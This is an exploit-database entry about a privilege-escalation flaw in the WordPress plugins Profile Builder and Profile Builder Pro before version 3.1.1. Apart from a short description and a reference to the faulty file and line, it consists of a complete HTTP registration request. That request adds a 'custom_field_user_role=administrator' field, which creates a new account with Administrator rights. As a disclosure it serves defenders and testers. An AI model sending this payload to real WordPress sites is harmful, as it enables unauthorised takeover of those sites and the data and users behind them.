Profile Builder and Profile Builder Pro < 3.1.1 - User Registration With Administrator Role

2020-02-10T00:00:00
ID WPEX-ID:10066
Type wpexploit
Reporter Noman Riffat
Modified 2020-02-15T00:00:00

Description

WordPress Vulnerability - Profile Builder and Profile Builder Pro < 3.1.1 - User Registration With Administrator Role

                                        
                                            Adding following extra parameter in registration form POST input or profile edit POST input will add/upgrade user to Administrator.

custom_field_user_role=administrator

The problem is in line number 194 of file profile-builder/front-end/default-fields/user-role/user-role.php as per latest version 3.1.0

POST /wordpress-5.3.2/register/ HTTP/1.1
Host: wp.lab
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------21180001813424994471925010347
Content-Length: 1686
Origin: http://wp.lab
DNT: 1
Connection: close
Referer: http://wp.lab/wordpress-5.3.2/register/
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1

-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="username"

test
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="first_name"


-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="last_name"


-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="nickname"


-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="email"

test@localhost.org
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="custom_field_user_role"

administrator
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="description"


-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="passw1"

xxxxxxxx
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="passw2"

xxxxxxxx
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="action"

register
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="form_name"

unspecified
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="register_unspecified_nonce_field"

d02f43e49c
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress-5.3.2/register/
-----------------------------21180001813424994471925010347--